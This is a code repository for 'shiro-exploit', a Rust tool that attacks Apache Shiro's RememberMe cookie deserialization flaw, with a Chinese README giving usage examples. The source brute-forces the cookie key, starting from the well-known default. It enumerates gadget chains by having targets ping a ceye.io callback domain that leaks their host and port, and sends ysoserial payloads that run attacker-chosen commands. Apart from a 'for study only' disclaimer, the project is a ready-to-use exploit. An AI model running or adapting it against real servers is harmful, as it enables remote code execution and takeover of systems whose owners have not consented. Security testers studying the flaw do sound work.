├── .github ├── FUNDING.yml ├── dependabot.yml └── workflows │ ├── pre-commit.yml │ ├── committed.yml │ ├── audit.yml │ ├── release-notes.py │ ├── test.yml │ ├── codeql-analysis.yml │ └── post-release.yml ├── dev └── hooks │ ├── pre-commit.sample │ └── pre-commit ├── .editorconfig ├── .cargo └── config ├── CHANGELOG.md ├── .gitignore ├── .pre-commit-config.yaml ├── Cargo.toml ├── src ├── cli.rs ├── main.rs ├── yso.rs └── lib.rs ├── README.md └── LICENSE /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | github: [ cn-kali-team ] -------------------------------------------------------------------------------- /dev/hooks/pre-commit.sample: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 执行 fmt 脚本,如果不正确需要将退出码设为非零 3 | cargo fmt --all 4 | 5 | # 获取上面脚本的退出码 6 | exitCode="$?" 7 | exit $exitCode -------------------------------------------------------------------------------- /.editorconfig: -------------------------------------------------------------------------------- 1 | [*] 2 | charset = utf-8 3 | 4 | 5 | [*.pest] 6 | indent_style = space 7 | indent_size = 4 8 | 9 | [*.toml] 10 | indent_style = space 11 | indent_size = 4 -------------------------------------------------------------------------------- /.cargo/config: -------------------------------------------------------------------------------- 1 | [target.x86_64-pc-windows-msvc] 2 | rustflags = ["-Ctarget-feature=+crt-static"] 3 | 4 | [target.i686-pc-windows-msvc] 5 | rustflags = ["-Ctarget-feature=+crt-static"] 6 | -------------------------------------------------------------------------------- /.github/dependabot.yml: -------------------------------------------------------------------------------- 1 | version: 2 2 | updates: 3 | - package-ecosystem: cargo 4 | directory: "/" 5 | schedule: 6 | interval: monthly 7 | time: "07:00" 8 | open-pull-requests-limit: 
10 9 | -------------------------------------------------------------------------------- /dev/hooks/pre-commit: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 执行 fmt 脚本,如果不正确需要将退出码设为非零 3 | cargo clippy --workspace --all-features --all-targets -- -D warnings --allow deprecated 4 | cargo fmt --all 5 | 6 | # 获取上面脚本的退出码 7 | exitCode="$?" 8 | exit $exitCode -------------------------------------------------------------------------------- /CHANGELOG.md: -------------------------------------------------------------------------------- 1 | # Change Log 2 | 3 | 4 | 5 | ## [Unreleased] - ReleaseDate 6 | 7 | ## [2022.10.10] - 2022.12.21 8 | 9 | ### Fixes 10 | 11 | - 更新命令行解析库为argh 12 | 13 | ## [2022.12.22] - 2022.12.22 14 | 15 | ### Fixes 16 | 17 | - 添加内置payload,添加爆破利用链 -------------------------------------------------------------------------------- /.github/workflows/pre-commit.yml: -------------------------------------------------------------------------------- 1 | name: pre-commit 2 | on: 3 | pull_request: 4 | push: 5 | branches: [main] 6 | jobs: 7 | pre-commit: 8 | runs-on: ubuntu-latest 9 | steps: 10 | - uses: actions/checkout@v2 11 | - uses: actions/setup-python@v2 12 | - uses: pre-commit/action@v2.0.3 13 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Generated by Cargo 2 | # will have compiled files and executables 3 | /target/ 4 | 5 | # Remove Cargo.lock from gitignore if creating an executable, leave it for libraries 6 | # More information here https://doc.rust-lang.org/cargo/guide/cargo-toml-vs-cargo-lock.html 7 | Cargo.lock 8 | 9 | # These are backup files generated by rustfmt 10 | **/*.rs.bk 11 | 12 | .idea/ -------------------------------------------------------------------------------- /.github/workflows/committed.yml: 
-------------------------------------------------------------------------------- 1 | # Not run as part of pre-commit checks because they don't handle sending the correct commit 2 | # range to `committed` 3 | name: Lint Commits 4 | on: [pull_request] 5 | 6 | jobs: 7 | committed: 8 | name: Lint Commits 9 | runs-on: ubuntu-latest 10 | steps: 11 | - name: Checkout Actions Repository 12 | uses: actions/checkout@v2 13 | with: 14 | fetch-depth: 0 15 | - name: Lint Commits 16 | uses: crate-ci/committed@master 17 | -------------------------------------------------------------------------------- /.github/workflows/audit.yml: -------------------------------------------------------------------------------- 1 | name: Security audit 2 | on: 3 | pull_request: 4 | paths: 5 | - '**/Cargo.toml' 6 | - '**/Cargo.lock' 7 | push: 8 | paths: 9 | - '**/Cargo.toml' 10 | - '**/Cargo.lock' 11 | schedule: 12 | - cron: '3 3 3 * *' 13 | jobs: 14 | security_audit: 15 | runs-on: ubuntu-latest 16 | steps: 17 | - name: Checkout repository 18 | uses: actions/checkout@v2 19 | - uses: actions-rs/audit-check@v1 20 | with: 21 | token: ${{ secrets.GITHUB_TOKEN }} 22 | -------------------------------------------------------------------------------- /.pre-commit-config.yaml: -------------------------------------------------------------------------------- 1 | repos: 2 | - repo: https://github.com/pre-commit/pre-commit-hooks 3 | rev: v2.3.0 4 | hooks: 5 | - id: check-yaml 6 | stages: [commit] 7 | - id: check-json 8 | stages: [commit] 9 | - id: check-toml 10 | stages: [commit] 11 | - id: check-merge-conflict 12 | stages: [commit] 13 | - id: check-case-conflict 14 | stages: [commit] 15 | - id: detect-private-key 16 | stages: [commit] 17 | - repo: https://github.com/crate-ci/committed 18 | rev: v1.0.1 19 | hooks: 20 | - id: committed 21 | stages: [commit-msg] 22 | -------------------------------------------------------------------------------- /.github/workflows/release-notes.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import argparse 4 | import re 5 | import pathlib 6 | import sys 7 | 8 | _STDIO = pathlib.Path("-") 9 | 10 | 11 | def main(): 12 | parser = argparse.ArgumentParser() 13 | parser.add_argument("-i", "--input", type=pathlib.Path, default="CHANGELOG.md") 14 | parser.add_argument("--tag", required=True) 15 | parser.add_argument("-o", "--output", type=pathlib.Path, required=True) 16 | args = parser.parse_args() 17 | 18 | if args.input == _STDIO: 19 | lines = sys.stdin.readlines() 20 | else: 21 | with args.input.open() as fh: 22 | lines = fh.readlines() 23 | version = args.tag.lstrip("v") 24 | 25 | note_lines = [] 26 | for line in lines: 27 | if line.startswith("## ") and version in line: 28 | note_lines.append(line) 29 | elif note_lines and line.startswith("## "): 30 | break 31 | elif note_lines: 32 | note_lines.append(line) 33 | 34 | notes = "".join(note_lines).strip() 35 | if args.output == _STDIO: 36 | print(notes) 37 | else: 38 | args.output.write_text(notes) 39 | 40 | 41 | if __name__ == "__main__": 42 | main() 43 | -------------------------------------------------------------------------------- /Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "shiro-exploit" #改这个 3 | version = "0.1.0" 4 | edition = "2021" 5 | authors = ["Kali-Team "] 6 | include = ["LICENSE", "Cargo.toml", "src/**/*.rs"] 7 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 8 | 9 | [workspace] 10 | members = ["."] 11 | 12 | #https://github.com/johnthagen/min-sized-rust 13 | [profile.release] 14 | opt-level = "z" # Optimize for size. 15 | lto = true # Enable Link Time Optimization 16 | codegen-units = 1 # Reduce number of codegen units to increase optimizations. 17 | panic = "abort" # Abort on panic 18 | strip = true # Automatically strip symbols from the binary. 
19 | 20 | [profile.dev.package."*"] 21 | opt-level = 3 22 | [profile.test] 23 | opt-level = 3 24 | lto = "thin" 25 | 26 | [profile.bench] 27 | lto = true 28 | codegen-units = 1 29 | opt-level = 3 30 | 31 | 32 | [dependencies] 33 | argh = "0.1.8" 34 | openssl = { version = "0.10", features = ["vendored"] } 35 | reqwest = { version = "0.11.6", features = [ 36 | "native-tls", 37 | "socks", 38 | "blocking", 39 | "gzip", 40 | "cookies", 41 | ] } 42 | anyhow = "1" 43 | tokio = { version = "1.19.2", default-features = false, features = [ 44 | "process", 45 | "macros", 46 | ] } 47 | encoding_rs = "0.8.28" 48 | mime = "0.3.16" 49 | select = "0.6.0" 50 | once_cell = "1.10.0" 51 | ysoserial_rs = { git = "https://github.com/emo-crab/ysoserial_rs" } 52 | uuid = { version = "1.2", features = ["serde", "v1", "v3", "v4"] } 53 | futures = { version = "0.3", features = ["compat"] } 54 | prettytable-rs = "0.9.0" 55 | -------------------------------------------------------------------------------- /src/cli.rs: -------------------------------------------------------------------------------- 1 | use argh::FromArgs; 2 | 3 | #[derive(Debug, Clone, FromArgs, Default)] 4 | #[argh(description = "shiro-exploit")] 5 | pub struct EmoArgs { 6 | /// you can specify known keys 7 | #[argh(option, default = "String::from(\"kPH+bIxk5D2deZiIxcaaaA==\")")] 8 | pub key: String, 9 | /// apache-shiro encryption algorithm,default: CBC 10 | #[argh(option, short = 'm')] 11 | pub mode: Option, 12 | /// the target 13 | #[argh(option, short = 't')] 14 | pub target: Option, 15 | /// serialize file 16 | #[argh(option, short = 's')] 17 | pub ser: Option, 18 | /// read the target from the file 19 | #[argh(option)] 20 | pub file: Option, 21 | /// read the key from the file 22 | #[argh(option)] 23 | pub keys: Option, 24 | /// export to the csv file 25 | #[argh(option)] 26 | pub csv: Option, 27 | /// proxy to use for requests (ex:[http(s)|socks5(h)]://host:port) 28 | #[argh(option)] 29 | pub proxy: Option, 30 | /// 
set request timeout 31 | #[argh(option, default = "default_timeout()")] 32 | pub timeout: u64, 33 | /// number of concurrent threads 34 | #[argh(option, default = "default_thread()")] 35 | pub thread: u32, 36 | /// enum chain mode 37 | #[argh(switch)] 38 | pub chain: bool, 39 | /// exploit mode 40 | #[argh(switch)] 41 | pub exploit: bool, 42 | /// dns identifier, default: 981tzg.ceye.io 43 | #[argh(option, default = "String::from(\"981tzg.ceye.io\")")] 44 | pub dns: String, 45 | /// select a payload 46 | #[argh(option, short = 'p')] 47 | pub payload: Option, 48 | /// command to execute 49 | #[argh(option, short = 'c')] 50 | pub command: Option, 51 | /// tomcat echo request header name 52 | #[argh(option)] 53 | pub echo_name: Option, 54 | /// tomcat command request header name 55 | #[argh(option)] 56 | pub command_name: Option, 57 | /// list all payload 58 | #[argh(switch, short = 'l')] 59 | pub list: bool, 60 | } 61 | 62 | fn default_thread() -> u32 { 63 | 100_u32 64 | } 65 | 66 | fn default_timeout() -> u64 { 67 | 10 68 | } 69 | 70 | impl EmoArgs { 71 | pub fn new() -> Self { 72 | let default: EmoArgs = argh::from_env(); 73 | default 74 | } 75 | pub fn get_method(&self) {} 76 | } 77 | -------------------------------------------------------------------------------- /.github/workflows/test.yml: -------------------------------------------------------------------------------- 1 | name: Test 2 | on: 3 | pull_request: 4 | paths: 5 | - '**' 6 | - '!/*.md' 7 | - '!/docs/**' 8 | - "!/LICENSE-*" 9 | push: 10 | branches: 11 | - main 12 | paths: 13 | - '**' 14 | - '!/*.md' 15 | - '!/docs/**' 16 | - "!/LICENSE-*" 17 | jobs: 18 | ci: 19 | name: CI 20 | needs: [ test,rustfmt,clippy ] 21 | if: github.actor != 'dependabot[bot]' 22 | runs-on: ubuntu-latest 23 | steps: 24 | - name: Done 25 | run: exit 0 26 | test: 27 | name: Test 28 | if: github.actor != 'dependabot[bot]' 29 | strategy: 30 | matrix: 31 | os: [ "ubuntu-latest", "windows-latest", "macos-latest" ] 32 | rust: [ "stable" 
] 33 | continue-on-error: ${{ matrix.rust != 'stable' }} 34 | runs-on: ${{ matrix.os }} 35 | steps: 36 | - name: Checkout repository 37 | uses: actions/checkout@v2 38 | - name: Install Rust 39 | uses: actions-rs/toolchain@v1 40 | with: 41 | toolchain: ${{ matrix.rust }} 42 | profile: minimal 43 | override: true 44 | - uses: Swatinem/rust-cache@v1 45 | - name: Build 46 | run: cargo test --no-run --workspace --all-features --all 47 | - name: Default features 48 | run: cargo test --workspace 49 | rustfmt: 50 | name: rustfmt 51 | if: github.actor != 'dependabot[bot]' 52 | runs-on: ubuntu-latest 53 | steps: 54 | - name: Checkout repository 55 | uses: actions/checkout@v2 56 | - name: Install Rust 57 | uses: actions-rs/toolchain@v1 58 | with: 59 | # Not MSRV because its harder to jump between versions and people are 60 | # more likely to have stable 61 | toolchain: stable 62 | profile: minimal 63 | override: true 64 | components: rustfmt 65 | - uses: Swatinem/rust-cache@v1 66 | - name: Check formatting 67 | run: cargo fmt --all -- --check 68 | clippy: 69 | name: clippy 70 | if: github.actor != 'dependabot[bot]' 71 | runs-on: ubuntu-latest 72 | steps: 73 | - name: Checkout repository 74 | uses: actions/checkout@v2 75 | - name: Install Rust 76 | uses: actions-rs/toolchain@v1 77 | with: 78 | toolchain: 1.58.1 # MSRV 79 | profile: minimal 80 | override: true 81 | components: clippy 82 | - uses: Swatinem/rust-cache@v1 83 | - uses: actions-rs/clippy-check@v1 84 | with: 85 | token: ${{ secrets.GITHUB_TOKEN }} 86 | args: --workspace --all-features --all-targets -- -D warnings --allow deprecated 87 | -------------------------------------------------------------------------------- /.github/workflows/codeql-analysis.yml: -------------------------------------------------------------------------------- 1 | # For most projects, this workflow file will not need changing; you simply need 2 | # to commit it to your repository. 
3 | # 4 | # You may wish to alter this file to override the set of languages analyzed, 5 | # or to provide custom queries or build logic. 6 | # 7 | # ******** NOTE ******** 8 | # We have attempted to detect the languages in your repository. Please check 9 | # the `language` matrix defined below to confirm you have the correct set of 10 | # supported CodeQL languages. 11 | # 12 | name: "CodeQL" 13 | 14 | on: 15 | push: 16 | branches: [ "main" ] 17 | pull_request: 18 | # The branches below must be a subset of the branches above 19 | branches: [ "main" ] 20 | schedule: 21 | - cron: '37 16 * * 1' 22 | 23 | jobs: 24 | analyze: 25 | name: Analyze 26 | runs-on: ubuntu-latest 27 | permissions: 28 | actions: read 29 | contents: read 30 | security-events: write 31 | 32 | strategy: 33 | fail-fast: false 34 | matrix: 35 | language: [ 'python' ] 36 | # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python', 'ruby' ] 37 | # Learn more about CodeQL language support at https://aka.ms/codeql-docs/language-support 38 | 39 | steps: 40 | - name: Checkout repository 41 | uses: actions/checkout@v3 42 | 43 | # Initializes the CodeQL tools for scanning. 44 | - name: Initialize CodeQL 45 | uses: github/codeql-action/init@v2 46 | with: 47 | languages: ${{ matrix.language }} 48 | # If you wish to specify custom queries, you can do so here or in a config file. 49 | # By default, queries listed here will override any specified in a config file. 50 | # Prefix the list here with "+" to use these queries and those in the config file. 51 | 52 | # Details on CodeQL's query packs refer to : https://docs.github.com/en/code-security/code-scanning/automatically-scanning-your-code-for-vulnerabilities-and-errors/configuring-code-scanning#using-queries-in-ql-packs 53 | # queries: security-extended,security-and-quality 54 | 55 | 56 | # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). 
57 | # If this step fails, then you should remove it and run the build manually (see below) 58 | - name: Autobuild 59 | uses: github/codeql-action/autobuild@v2 60 | 61 | # ℹ️ Command-line programs to run using the OS shell. 62 | # 📚 See https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idstepsrun 63 | 64 | # If the Autobuild fails above, remove it and uncomment the following three lines. 65 | # modify them (or add more) to build your code if your project, please refer to the EXAMPLE below for guidance. 66 | 67 | # - run: | 68 | # echo "Run, Build Application using script" 69 | # ./location_of_script_within_repo/buildscript.sh 70 | 71 | - name: Perform CodeQL Analysis 72 | uses: github/codeql-action/analyze@v2 73 | -------------------------------------------------------------------------------- /src/main.rs: -------------------------------------------------------------------------------- 1 | use anyhow::Error; 2 | use futures::channel::mpsc::unbounded; 3 | use futures::stream::FuturesUnordered; 4 | use futures::StreamExt; 5 | use shiro_exploit::{print_results_and_save, read_file_to_target, yso, ShiroVerify, EMO_ARGS}; 6 | use std::collections::HashSet; 7 | 8 | #[tokio::main] 9 | async fn main() { 10 | match start().await { 11 | Ok(_) => {} 12 | Err(e) => println!("{}", e), 13 | } 14 | } 15 | 16 | async fn burst(mut sv: ShiroVerify) -> ShiroVerify { 17 | sv.burst_key().await; 18 | sv 19 | } 20 | 21 | async fn exploit(mut sv: ShiroVerify) -> ShiroVerify { 22 | // 爆破利用链 23 | if EMO_ARGS.chain { 24 | sv.enum_chain().await; 25 | } 26 | // 利用 27 | if EMO_ARGS.exploit { 28 | sv.exploit().await; 29 | } 30 | sv 31 | } 32 | 33 | async fn start() -> Result<(), Error> { 34 | if EMO_ARGS.list { 35 | yso::list(); 36 | } 37 | if let Some(p) = &EMO_ARGS.payload { 38 | yso::get_payload(p); 39 | } 40 | let mut targets = HashSet::new(); 41 | if let Some(target) = &EMO_ARGS.target { 42 | targets.insert(String::from(target)); 43 | } 44 | if 
let Some(file_path) = &EMO_ARGS.file { 45 | targets.extend(read_file_to_target(file_path)); 46 | } 47 | let mut vec_results: Vec = Vec::new(); 48 | let (verify_sender, mut verify_receiver) = unbounded(); 49 | let (mut burst_sender, mut burst_receiver) = unbounded(); 50 | let (mut results_sender, mut results_receiver) = unbounded(); 51 | //验证是不是shiro,相当与指纹识别 52 | let verify_handle = tokio::task::spawn(async move { 53 | let mut worker = FuturesUnordered::new(); 54 | let mut targets_iter = targets.iter(); 55 | for _ in 0..EMO_ARGS.thread { 56 | match targets_iter.next() { 57 | Some(target) => worker.push(ShiroVerify::new(target.to_string())), 58 | None => { 59 | break; 60 | } 61 | } 62 | } 63 | while let Some(sv) = worker.next().await { 64 | if let Some(target) = targets_iter.next() { 65 | worker.push(ShiroVerify::new(target.to_string())); 66 | } 67 | verify_sender.unbounded_send(sv).unwrap_or_default(); 68 | } 69 | true 70 | }); 71 | //爆破key 72 | let burst_handle = tokio::task::spawn(async move { 73 | let mut worker = FuturesUnordered::new(); 74 | for _ in 0..3 { 75 | match verify_receiver.next().await { 76 | Some(sv) => { 77 | worker.push(burst(sv)); 78 | } 79 | None => { 80 | break; 81 | } 82 | } 83 | } 84 | while let Some(sv) = worker.next().await { 85 | if let Some(sv) = verify_receiver.next().await { 86 | worker.push(burst(sv)); 87 | } 88 | burst_sender.start_send(sv).unwrap_or_default(); 89 | } 90 | true 91 | }); 92 | let chain_handle = tokio::task::spawn(async move { 93 | let mut worker = FuturesUnordered::new(); 94 | for _ in 0..3 { 95 | match burst_receiver.next().await { 96 | Some(sv) => { 97 | worker.push(exploit(sv)); 98 | } 99 | None => { 100 | break; 101 | } 102 | } 103 | } 104 | while let Some(sv) = worker.next().await { 105 | if let Some(sv) = burst_receiver.next().await { 106 | worker.push(exploit(sv)); 107 | } 108 | results_sender.start_send(sv).unwrap_or_default(); 109 | } 110 | true 111 | }); 112 | let (_r1, _r2, _r3) = tokio::join!(verify_handle, 
burst_handle, chain_handle); 113 | while let Some(sv) = results_receiver.next().await { 114 | if sv.target.is_some() { 115 | vec_results.push(sv); 116 | } 117 | } 118 | print_results_and_save(vec_results); 119 | Ok(()) 120 | } 121 | -------------------------------------------------------------------------------- /src/yso.rs: -------------------------------------------------------------------------------- 1 | use crate::EMO_ARGS; 2 | use once_cell::sync::Lazy; 3 | use reqwest::Url; 4 | use std::collections::HashMap; 5 | use std::process; 6 | use ysoserial_rs::*; 7 | 8 | type NoArgs = fn() -> Vec; 9 | type OneArgs = fn(&str) -> Vec; 10 | type TwoArgs = fn(&str, &str) -> Vec; 11 | 12 | pub static COMMAND_PAYLOAD_MAP: Lazy> = 13 | Lazy::new(|| -> HashMap<&str, OneArgs> { 14 | HashMap::from_iter([ 15 | ("bs1", get_commons_beanutils1 as OneArgs), 16 | ("cc1", get_commons_collections1), 17 | ("cc2", get_commons_collections2), 18 | ("cc3", get_commons_collections3), 19 | ("cc4", get_commons_collections4), 20 | ("cc5", get_commons_collections5), 21 | ("cc6", get_commons_collections6), 22 | ("cc7", get_commons_collections7), 23 | ("cck1", get_commons_collections_k1), 24 | ("cck2", get_commons_collections_k2), 25 | ("cck3", get_commons_collections_k3), 26 | ("cck4", get_commons_collections_k4), 27 | ("clojure", get_clojure), 28 | ("groovy1", get_groovy1), 29 | ("hibernate1", get_hibernate1), 30 | ("hibernate2", get_hibernate2), 31 | ("javassist_weld1", get_javassist_weld1), 32 | ("jboss_interceptors1", get_jboss_interceptors1), 33 | ("jdk7u21", get_jdk7u21), 34 | ("jdk8u20", get_jdk8u20), 35 | ("json1", get_json1), 36 | ("mozilla_rhino1", get_mozilla_rhino1), 37 | ("mozilla_rhino2", get_mozilla_rhino2), 38 | ("myfaces1", get_myfaces1), 39 | ("rome", get_rome), 40 | ("spring1", get_spring1), 41 | ("spring2", get_spring2), 42 | ("vaadin1", get_vaadin1), 43 | ]) 44 | }); 45 | pub static URL_PAYLOAD_MAP: Lazy> = 46 | Lazy::new(|| -> HashMap<&str, OneArgs> { 47 | 
HashMap::from_iter([ 48 | ("url_dns", get_url_dns as OneArgs), 49 | ("c3p0", get_c3p0 as OneArgs), 50 | ]) 51 | }); 52 | pub static HEADER_PAYLOAD_MAP: Lazy> = 53 | Lazy::new(|| -> HashMap<&str, TwoArgs> { 54 | HashMap::from_iter([ 55 | ("cck1_tomcat_echo", get_cck1_tomcat_echo as TwoArgs), 56 | ("cck2_tomcat_echo", get_cck2_tomcat_echo as TwoArgs), 57 | ]) 58 | }); 59 | static SHIRO_PAYLOAD_MAP: Lazy> = Lazy::new(|| -> HashMap<&str, NoArgs> { 60 | HashMap::from_iter([("shiro_spc", get_shiro_simple_principal_collection as NoArgs)]) 61 | }); 62 | 63 | pub fn list() { 64 | println!("Payload List:\n------------"); 65 | let mut all_payload = COMMAND_PAYLOAD_MAP 66 | .keys() 67 | .map(|x| x.to_string()) 68 | .collect::>(); 69 | all_payload.extend( 70 | URL_PAYLOAD_MAP 71 | .keys() 72 | .map(|x| x.to_string()) 73 | .collect::>(), 74 | ); 75 | all_payload.extend( 76 | HEADER_PAYLOAD_MAP 77 | .keys() 78 | .map(|x| x.to_string()) 79 | .collect::>(), 80 | ); 81 | all_payload.extend( 82 | SHIRO_PAYLOAD_MAP 83 | .keys() 84 | .map(|x| x.to_string()) 85 | .collect::>(), 86 | ); 87 | all_payload.sort(); 88 | for p in all_payload { 89 | println!("{}", p); 90 | } 91 | process::exit(0); 92 | } 93 | 94 | pub fn get_payload(p: &str) -> Vec { 95 | if let Some(command_func) = COMMAND_PAYLOAD_MAP.get(p as &str) { 96 | if let Some(cmd) = &EMO_ARGS.command { 97 | command_func(cmd) 98 | } else { 99 | println!("该Payload需要指定执行的命令行"); 100 | process::exit(0); 101 | } 102 | } else if let Some(url_func) = URL_PAYLOAD_MAP.get(p as &str) { 103 | let payload = url_func(&format!("http://{}", &EMO_ARGS.dns)); 104 | payload 105 | } else if let Some(header_func) = HEADER_PAYLOAD_MAP.get(p as &str) { 106 | if let (Some(echo_name), Some(command_name)) = (&EMO_ARGS.echo_name, &EMO_ARGS.command_name) 107 | { 108 | header_func(echo_name, command_name) 109 | } else { 110 | println!("该Payload需要指定回显请求头和命令请求头"); 111 | process::exit(0); 112 | } 113 | } else if let Some(shiro_func) = SHIRO_PAYLOAD_MAP.get(p as 
&str) { 114 | shiro_func() 115 | } else { 116 | println!("请指定Payload"); 117 | process::exit(0); 118 | } 119 | } 120 | 121 | pub fn get_enum_chain_payload(p: &str, target: &Url) -> Vec { 122 | let dns = format!( 123 | "{}.{}.{}.{}", 124 | p, 125 | target.host_str().unwrap_or_default(), 126 | target.port_or_known_default().unwrap_or_default(), 127 | EMO_ARGS.dns 128 | ); 129 | let ping = format!("ping -n 2 -w 2 {}", dns); 130 | if let Some(command_func) = COMMAND_PAYLOAD_MAP.get(p as &str) { 131 | command_func(&ping) 132 | } else if let Some(url_func) = URL_PAYLOAD_MAP.get(p as &str) { 133 | return url_func(&format!("http://{}", &dns)); 134 | } else if let Some(header_func) = HEADER_PAYLOAD_MAP.get(p as &str) { 135 | if let (Some(echo_name), Some(command_name)) = (&EMO_ARGS.echo_name, &EMO_ARGS.command_name) 136 | { 137 | header_func(echo_name, command_name) 138 | } else { 139 | Vec::new() 140 | } 141 | } else { 142 | Vec::new() 143 | } 144 | } 145 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | > 郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担。 2 | 3 | ## 使用方法 4 | 5 | ```bash 6 | ➜ ~ shiro-exploit --help 7 | Usage: shiro-exploit [--key ] [-m ] [-t ] [-s ] [--file ] [--keys ] [--csv ] [--proxy ] [--timeout ] [--thread ] [--chain] [--exploit] [--dns ] [-p ] [-c ] [--echo-name ] [--command-name ] [-l] 8 | 9 | shiro-exploit 10 | 11 | Options: 12 | --key you can specify known keys 13 | -m, --mode apache-shiro encryption algorithm,default: CBC 14 | -t, --target the target 15 | -s, --ser serialize file 16 | --file read the target from the file 17 | --keys read the key from the file 18 | --csv export to the csv file 19 | --proxy proxy to use for requests 20 | (ex:[http(s)|socks5(h)]://host:port) 21 | --timeout set request timeout 22 | --thread number of concurrent threads 23 | --chain enum chain mode 24 | --exploit exploit mode 
25 | --dns dns identifier, default: 981tzg.ceye.io 26 | -p, --payload select a payload 27 | -c, --command command to execute 28 | --echo-name tomcat echo request header name 29 | --command-name tomcat command request header name 30 | -l, --list list all payload 31 | --help display usage information 32 | 33 | ``` 34 | 35 | ## 详细参数 36 | 37 | - `--key`指定Key,默认`kPH+bIxk5D2deZiIxcaaaA==` 38 | - `-m`指定加密模式,默认`CBC`,可选:`GCM` 39 | - `-t`单个目标 40 | - `-s`读入ysoserial生成的文件作为payload 41 | - `--file`从文件读入目标 42 | - `--keys`从文件读入key 43 | - `--csv`导出到csv文件 44 | - `--exploit`利用模式,爆破出key后,如果开启exploit模式会读入ysoserial生成的文件作为payload,如果`--ser` 45 | 参数为空,则为`--dns`作为URL_DNS的参数生成payload 46 | - `--dns`验证的DNS服务器,请求为目标的`主机名_端口.你的DNS记录服务器`,默认为`981tzg.ceye.io` 47 | - `-p`使用内置payload,配合`-c`或者`--dns`和`--echo-name`,`--command-name`,tomcat回显后面再更新 48 | - `-l`列出内置payload 49 | - `--chain`枚举利用链,结果查看DNS记录服务,前缀就是利用链名称。 50 | 51 | ## 使用ysoserial文件 52 | 53 | ```bash 54 | ➜ ~ shiro-exploit -t http://127.0.0.1:8080 --exploit --ser /home/kali-team/1.ser 55 | +-------------------------------------------------------------------------+--------+--------+------+--------------------------+ 56 | | url | method | verify | mode | key | 57 | +=========================================================================+========+========+======+==========================+ 58 | | http://127.0.0.1:8080/login;jsessionid=EAEAD8C3FA8884D816F575E55B654694 | GET | true | CBC | kPH+bIxk5D2deZiIxcaaaA== | 59 | +-------------------------------------------------------------------------+--------+--------+------+--------------------------+ 60 | 61 | ``` 62 | 63 | ## 使用DNS记录验证漏洞 64 | 65 | ```bash 66 | ➜ ~ shiro-exploit -t http://127.0.0.1:8080 --exploit --dns 981tzg.ceye.io 67 | +-------------------------------------------------------------------------+--------+--------+------+--------------------------+ 68 | | url | method | verify | mode | key | 69 | 
+=========================================================================+========+========+======+==========================+ 70 | | http://127.0.0.1:8080/login;jsessionid=E01994D45911DE55FCE6606CFFF48AC7 | GET | true | CBC | kPH+bIxk5D2deZiIxcaaaA== | 71 | +-------------------------------------------------------------------------+--------+--------+------+--------------------------+ 72 | 73 | ``` 74 | 75 | ## 爆破利用链 76 | 77 | - 主要利用ping命令带上利用链名称拼接到DNS前缀,如果能在DNS记录中看到说明可以使用该利用链 78 | 79 | ```bash 80 | ➜ ~ shiro-exploit -t http://127.0.0.1:8080 --exploit --dns 981tzg.ceye.io --chain 81 | +-------------------------------------------------------------------------+--------+--------+------+--------------------------+ 82 | | url | method | verify | mode | key | 83 | +=========================================================================+========+========+======+==========================+ 84 | | http://127.0.0.1:8080/login;jsessionid=E01994D45911DE55FCE6606CFFF48AC7 | GET | true | CBC | kPH+bIxk5D2deZiIxcaaaA== | 85 | +-------------------------------------------------------------------------+--------+--------+------+--------------------------+ 86 | 87 | ``` 88 | 89 | - 查看DNS记录得到可用利用链,说明`bs1`,`cck3`,`cc5`,`cc7`,`cck1`和`cc6`利用链可用 90 | 91 | ```csv 92 | 969227011 bs1.127.0.0.1.8080.981tzg.ceye.io 127.0.0.1 2022-12-22 13:48:20 93 | 969226980 bs1.127.0.0.1.8080.981tzg.ceye.io 127.0.0.1 2022-12-22 13:48:19 94 | 969226976 ccK3.127.0.0.1.8080.981tZG.cEYE.Io 127.0.0.1 2022-12-22 13:48:19 95 | 969226947 cc5.127.0.0.1.8080.981tzg.ceye.io 127.0.0.1 2022-12-22 13:48:18 96 | 969226945 cc7.127.0.0.1.8080.981tzg.ceye.io 127.0.0.1 2022-12-22 13:48:18 97 | 969226936 cCK3.127.0.0.1.8080.981tzg.ceyE.iO 127.0.0.1 2022-12-22 13:48:18 98 | 969226932 cck1.127.0.0.1.8080.981tzg.ceye.io 127.0.0.1 2022-12-22 13:48:18 99 | 969226818 cc6.127.0.0.1.8080.981tzg.ceye.io 127.0.0.1 2022-12-22 13:48:14 100 | ``` 101 | 102 | ## 使用内置ysoserial 103 | 104 | - 
payload来自:(ysoserial_rs)[https://github.com/emo-cat/ysoserial_rs] 105 | - 例如使用利用`commons_collections_k1`链执行命令,使用`-p`指定利用链,`-c`指定要执行的命令 106 | 107 | ```bash 108 | ➜ ~ shiro-exploit -t http://127.0.0.1:8080 --exploit -p cck1 -c "ping qq.com" 109 | +-------------------------------------------------------------------------+--------+--------+------+--------------------------+ 110 | | url | method | verify | mode | key | 111 | +=========================================================================+========+========+======+==========================+ 112 | | http://127.0.0.1:8080/login;jsessionid=5FAF1087D2448C017C2959B2AC02CDAF | GET | true | CBC | kPH+bIxk5D2deZiIxcaaaA== | 113 | +-------------------------------------------------------------------------+--------+--------+------+--------------------------+ 114 | 115 | ``` -------------------------------------------------------------------------------- /.github/workflows/post-release.yml: -------------------------------------------------------------------------------- 1 | # The way this works is the following: 2 | # 3 | # The create-release job runs purely to initialize the GitHub release itself 4 | # and to output upload_url for the following job. 5 | # 6 | # The build-release job runs only once create-release is finished. It gets the 7 | # release upload URL from create-release job outputs, then builds the release 8 | # executables for each supported platform and attaches them as release assets 9 | # to the previously created release. 10 | # 11 | # The key here is that we create the release only once. 
